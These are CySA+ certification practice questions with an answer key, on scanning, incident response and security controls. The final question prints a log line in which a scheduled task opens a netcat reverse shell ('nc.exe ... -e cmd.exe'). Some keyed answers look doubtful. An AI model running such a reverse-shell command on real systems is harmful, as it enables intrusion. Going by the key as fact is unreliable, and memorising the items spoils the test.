CompTIA CySA+ (CS0-001) 5 Practice Certification Exams Set 4

Bob needs to verify that workstations he is responsible for have received a particular critical Windows patch. Which method should be used to validate the patch status for all of the Windows 10 systems?

Options are:

  • Check the Update History manually
  • Run a Nessus scan for the particular CVE
  • Create and run a PowerShell script to search for the specific patch in question
  • Use SCCM to validate patch status for each machine on the domain

Answer: Run a Nessus scan for the particular CVE

Jamie has been tasked with finding a rogue network device on her wired network. What option is NOT likely to help identify the rogue device?

Options are:

  • MAC validation
  • Port scanning
  • Site surveys
  • War-walking

Answer: War-walking

If there is an expected loss of ______ or more, then the federal government classifies the economic impact of a security incident as high.

Options are:

  • $1
  • $10,000
  • $100,000
  • $500,000

Answer: $500,000

Alissa doesn't want to run a program installed by a user that she believes is set with a RunOnce key in the registry, but she needs to boot the system. What can she do to prevent the RunOnce from executing the programs listed in the registry key?

Options are:

  • Disable the registry at boot
  • Boot with Safe Mode
  • Boot with the -RunOnce flag
  • RunOnce cannot be disabled; she will need to boot from external media to disable it first.

Answer: Boot with Safe Mode

Tanner needs to sanitize hard drives from several leased workstations that are being returned to the supplier at the end of the lease period. The drives contained information that his organization classifies as sensitive data that some companies would find valuable if they could obtain it. Which is the most appropriate choice to ensure that data exposure doesn't occur during this process?

Options are:

  • Clear, validate, and document
  • Purge the drives
  • Purge, validate, and document
  • The drives must be destroyed to ensure no data loss

Answer: Purge, validate, and document

You are a cyber security analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is TRUE?

BEGIN OUTPUT
----------------

# nmap win2k12.local

Nmap scan report for win2k12 (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

# nc win2k12.local 80

220 win2k12.local BeverageCorp SMTP Server (Postfix/2.4.1)

# nc win2k12.local 22

SSH-2.0-OpenSSH_7.2 Debian-2

----------------
END OUTPUT

Options are:

  • Your email server is running on a non-standard port
  • Your email server has been compromised
  • Your organization has a vulnerable version of the SSH server software installed
  • Your web server has been compromised

Answer: Your email server is running on a non-standard port

You have been asked by the Security Operations Center Manager to look over a recent network utilization report because he fears that something may be wrong. The report is as follows:

IP Address      Server Name   Server Uptime      Historical   Current
192.168.20.2    web01         7D 12H 32M 06S     42.6 GB      44.1 GB
192.168.20.3    webdev02      4D 07H 12M 45S     1.95 GB      2.13 GB
192.168.20.4    dbsvr01       12D 02H 46M 14S    3.15 GB      24.6 GB
192.168.20.5    marketing01   2D 17H 18M 41S     5.2 GB       4.9 GB

Based on the report provided, what server do you think your cyber security analysts need to investigate further?

Options are:

  • web01
  • webdev02
  • dbsvr01
  • marketing01

Answer: dbsvr01

You are a cyber security analyst and have been asked to review the following packet of information:

23:12:23.154234 IP 172.18.10.3:25 > 192.168.10.45:3389 Flags [P.], seq 1834:1245, ack 1, win 511, options [nop,nop,TS val 263451334 ecr 482862734], length 125

After looking over the information on the packet, you discovered there is an unauthorized service running on the host. What ACL should be implemented to prevent further access to the unauthorized service while maintaining full access to the approved services running on that host?

Options are:

  • DENY TCP ANY HOST 192.168.10.45 EQ 3389
  • DENY IP HOST 192.168.10.45 ANY EQ 25
  • DENY IP HOST 172.18.10.3 HOST 192.168.10.45 EQ 3389
  • DENY TCP ANY HOST 172.18.10.3 EQ 25

Answer: DENY TCP ANY HOST 192.168.10.45 EQ 3389

Your company has recently been the victim of a large-scale data breach. The hackers were able to exfiltrate the personal information and social security numbers of your customers during their attack. The Chief Executive Officer has notified law enforcement about the breach, and they will be assisting with the investigation into the cause and helping to collect evidence in an attempt to put the hackers in prison. What actions should you take in response to this event?

Options are:

  • You should provide training to all your employees about the proper incident communication channels to use during a security event
  • You should ask all employees to commit to an NDA about the data breach verbally
  • You should block all employee access to social media from the company's network
  • You should ask a member of law enforcement to meet with your employees

Answer: You should ask a member of law enforcement to meet with your employees

Certain permissions are set on a directory structure on a Windows system that Tony is currently investigating. Which Sysinternals tool will provide him with this information?

Options are:

  • DiskView
  • AccessEnum
  • du
  • AccessChk

Answer: AccessEnum

Jonathan's team completed the first phase of their incident response process. They're currently assessing the time to recover from the incident. Using the NIST recoverability effort categories, the team has decided that they can predict the time to recover, but this requires additional resources. How should he categorize this using the NIST model?

Options are:

  • Regular
  • Supplemented
  • Extended
  • Not recoverable

Answer: Supplemented

What is NOT a means of improving data validation and trust?

Options are:

  • Encrypting data in transit
  • Using MD5 checksums for files
  • Decrypting data at rest
  • Implementing Tripwire

Answer: Decrypting data at rest

Rhett is currently tracing activity from an attacker who compromised a host on the network. The individual appears to have used credentials belonging to a janitor. After breaching the system, the attacker entered some unrecognized commands with very long strings of text and then began using the sudo command to carry out actions. What type of attack has just taken place?

Options are:

  • Privilege escalation
  • Phishing
  • Social engineering
  • Session hijacking

Answer: Privilege escalation

Ellen is asked for a code that is sent to her via text (SMS) message during her login process. What concerns should she raise to the manager of her organization's AAA services?

Options are:

  • SMS should be encrypted to be secure.
  • SMS messages may be accessible to attackers via VoIP or other systems.
  • SMS should be paired with a third factor.
  • SMS is secure, and she should not raise a concern.

Answer: SMS messages may be accessible to attackers via VoIP or other systems.

Stewart is responsible for conducting periodic reviews of the information security policy for his organization, of which he is the CISO. The policy was drafted three years ago and has had a few revisions after some audits and assessments have taken place. Which of the following is the most reasonable frequency to conduct formal reviews?

Options are:

  • Monthly
  • Quarterly
  • Annually
  • Every five years

Answer: Annually

A software assurance laboratory is performing a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. In what phase of the SDLC does fuzzing occur?

Options are:

  • Planning phase
  • Requirements phase
  • Prototyping phase
  • Static code analysis

Answer: Prototyping phase

Of the following connection status messages, which one indicates an active connection between two systems?

Options are:

  • ESTABLISHED
  • LISTENING
  • LAST_ACK
  • CLOSE_WAIT

Answer: ESTABLISHED

You have been hired as a consultant to help a company, Blueboard Enterprises, develop a new disaster recovery plan. Blueboard has recently grown in the number of employees, and so has its information systems infrastructure to support those new employees. Unfortunately, Blueboard doesn't currently have any documentation, policies, or procedures for its network. What is the first step you should recommend to Blueboard's management in order to help in the development of the disaster recovery plan?

Options are:

  • Conduct a risk assessment
  • Develop a data retention policy
  • Execute vulnerability scanning
  • Identify assets

Answer: Identify assets

What type of controls are firewalls, intrusion detection systems, and RADIUS examples of?

Options are:

  • Administrative controls
  • Technical controls
  • Physical controls
  • Compensating controls

Answer: Technical controls

Which protocol is paired with OAuth2 to provide authentication services in a federated identity management solution on the Web?

Options are:

  • Kerberos
  • ADFS
  • SAML
  • OpenID

Answer: OpenID

Joe and Mary work together to review Joe's code, with Joe explaining the code he wrote as Mary reviews it. What code review technique are Joe and Mary using?

Options are:

  • Pair programming
  • Dual control
  • Over-the-shoulder
  • Tool assisted review

Answer: Over-the-shoulder

Which of the following is not normally part of an endpoint security suite?

Options are:

  • IPS
  • Firewall
  • Antimalware
  • VPN

Answer: VPN

Lisa is working with a development team on including security best practices in the SDLC. She frequently consults the Center for Internet Security's system design recommendations. Which of the following control categories would contain information helpful for her?

Options are:

  • Inventory of authorized/unauthorized devices
  • Controlled use of administrative privileges
  • Application software security
  • Malware defenses

Answer: Application software security

Nate has been tasked with choosing a firewall to protect his organization's internal infrastructure from network-based attacks. Which of the following is not an option that would meet his requirements?

Options are:

  • Cisco NGFW
  • HP TippingPoint
  • CheckPoint appliance
  • Palo Alto NGFW

Answer: HP TippingPoint

Of the following vulnerability scanning tools, which option is limited to collecting information from specific operating systems only?

Options are:

  • Nikto
  • OpenVAS
  • MBSA
  • Qualys

Answer: MBSA

Which tool would allow you to conduct operating system fingerprinting, which typically relies on responses to TCP/IP stack fingerprinting techniques?

Options are:

  • nmap
  • dd
  • scanf
  • msconfig

Answer: nmap

What role do the offensive participants perform in a tabletop exercise (TTX)?

Options are:

  • Security analysts
  • System administrators
  • Blue team
  • Red Team

Answer: Red Team

What is the lowest layer (bottom layer) of a bare-metal virtualization environment?

Options are:

  • Hypervisor
  • Host operating system
  • Guest operating system
  • Physical hardware

Answer: Physical hardware

What control provides the best protection against both SQL injection and cross-site scripting attacks?

Options are:

  • Hypervisors
  • Network layer firewalls
  • CSRF
  • Input validation

Answer: Input validation

You have just completed running a vulnerability scan and received the following output:

CVE-2011-3389
QID 42366 - SSLv3.0 / TLSv1.0 Protocol Weak CBC Mode Server Side Vulnerability
Check with: openssl s_client -connect qualys.jive.mobile.com:443 -tls1 -cipher "AES:CAMELLIA:SEED:3DES:DES"

What vulnerability was identified by the scan?

Options are:

  • PKI transfer vulnerability
  • Active Directory encryption vulnerability
  • Web application cryptography vulnerability
  • VPN tunnel vulnerability

Answer: Web application cryptography vulnerability

A recent vulnerability scan found several vulnerabilities on an organization's public internet-facing IP addresses. In order to reduce the risk of a breach, what vulnerability should be prioritized for remediation first?

Options are:

  • A cryptographically weak encryption cipher
  • A website utilizing a self-signed SSL certificate
  • A buffer overflow that is known to allow remote code execution
  • An HTTP response that reveals an internal IP address

Answer: A buffer overflow that is known to allow remote code execution

What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker?

Options are:

  • Zone transfers
  • DNS registration
  • AXR
  • DNSSEC

Answer: Zone transfers

You have been tasked to create some baseline system images in order to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry standard benchmarks and that the baseline creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry standard benchmarks?

Options are:

  • Utilizing an operating system SCAP plugin
  • Utilizing an authorized credential scan
  • Utilizing a non-credential scan
  • Utilizing a known malware plugin

Answer: Utilizing an operating system SCAP plugin

Vulnerability scans must be conducted on a continuous basis in order to meet regulatory compliance requirements for the storage of PHI. During the last vulnerability scan, a cyber security analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information Security Officer (CISO) for a plan to remediate all the known issues. What should the analyst do next?

Options are:

  • The analyst should attempt to identify all the false positives and exceptions, then resolve all the remaining items.
  • The analyst should wait to perform any additional scanning until the current list of vulnerabilities has been remediated fully.
  • The analyst should place any assets that contain PHI in a sandbox environment and then remediate all the vulnerabilities.
  • The analyst should filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first.

Answer: The analyst should filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first.

What provides a standard nomenclature for describing security-related software flaws?

Options are:

  • CVE
  • SOX
  • Patch
  • Vulnerability

Answer: CVE

Which of the protocols listed is not likely to be a trigger for a vulnerability scan alert when it's used to support a virtual private network (VPN)?

Options are:

  • IPSec
  • SSLv2
  • PPTP
  • SSLv3

Answer: IPSec

A cyber security analyst works at a college that wants to increase the security of its network by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. This solution must be able to scale up or down as new students and faculty use the network. Additionally, the college wants to minimize the amount of false positives and ensure high accuracy of the results. The solution must also be centrally managed through an enterprise console. What scanning topology would be BEST to meet these requirements?

Options are:

  • Passive scanning engine located at the core of the network infrastructure
  • Combination of cloud-based and server-based scanning engines
  • Combination of server-based and agent-based scanning engines
  • Active scanning engine installed on the enterprise console

Answer: Active scanning engine installed on the enterprise console

Which one of the listed approaches gives the most current and accurate information about the vulnerabilities present in a system because of an operating system that has misconfigured settings?

Options are:

  • On-demand vulnerability scanning
  • Continuous vulnerability scanning
  • Scheduled vulnerability scanning
  • Agent-based monitoring

Answer: Agent-based monitoring

Marsha noticed that a management interface for a virtualization platform was exposed to a scanner when performing a vulnerability scan of her data center. In normal circumstances, what would the proper exposure for this interface be?

Options are:

  • Internet
  • Internal networks
  • No exposure
  • Management network

Answer: Management network

What is an insecure protocol that should not be used?

Options are:

  • Telnet
  • SSH
  • SFTP
  • HTTPS

Answer: Telnet

Greg is worried about theft of sensitive information that's stored in a database. Which of the following vulnerabilities poses a direct threat to this information?

Options are:

  • SQL injection
  • Cross-site scripting
  • Buffer overflow
  • Denial of service

Answer: SQL injection

Neil ran a port scan on a network device. Which of the following ports listed (open) represents the most significant possible security vulnerability?

Options are:

  • 22
  • 23
  • 161
  • 443

Answer: 23

Which of the following is the most difficult to confirm with an external vulnerability scan?

Options are:

  • Cross-site scripting (XSS)
  • Cross-site request forgery (XSRF/CSRF)
  • Blind SQL injection
  • Unpatched web server

Answer: Blind SQL injection

Edward's IDS reports that ports 1 to 1024 received SYN packets from a remote host. What has likely happened to cause this traffic?

Options are:

  • Remote host cannot find the right service port
  • SYN flood
  • Port scan
  • UDP probe

Answer: Port scan

A company has an open investigation and hires you as a cyber security analyst to assist with the investigation. When you arrive, you begin by reviewing some security logs. During the log review, you notice the following snippet of code:

sc config schedule start= auto
net start schedule
at 10:42 ""c:\temp\nc.exe 172.16.34.12 443 -e cmd.exe""

What BEST describes the situation and recommendations you should make to remedy this situation?

Options are:

  • The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network.
  • The host (172.16.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not currently a threat.
  • The host (172.16.34.12) is beaconing every day at 10:42 by running nc.exe from the temp directory; You recommend removing the host from the network.
  • The host (172.16.34.12) is a rogue device on the network; You recommend removing the host from the network.

Answer: The host (172.16.34.12) is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory; You recommend removing the host from the network.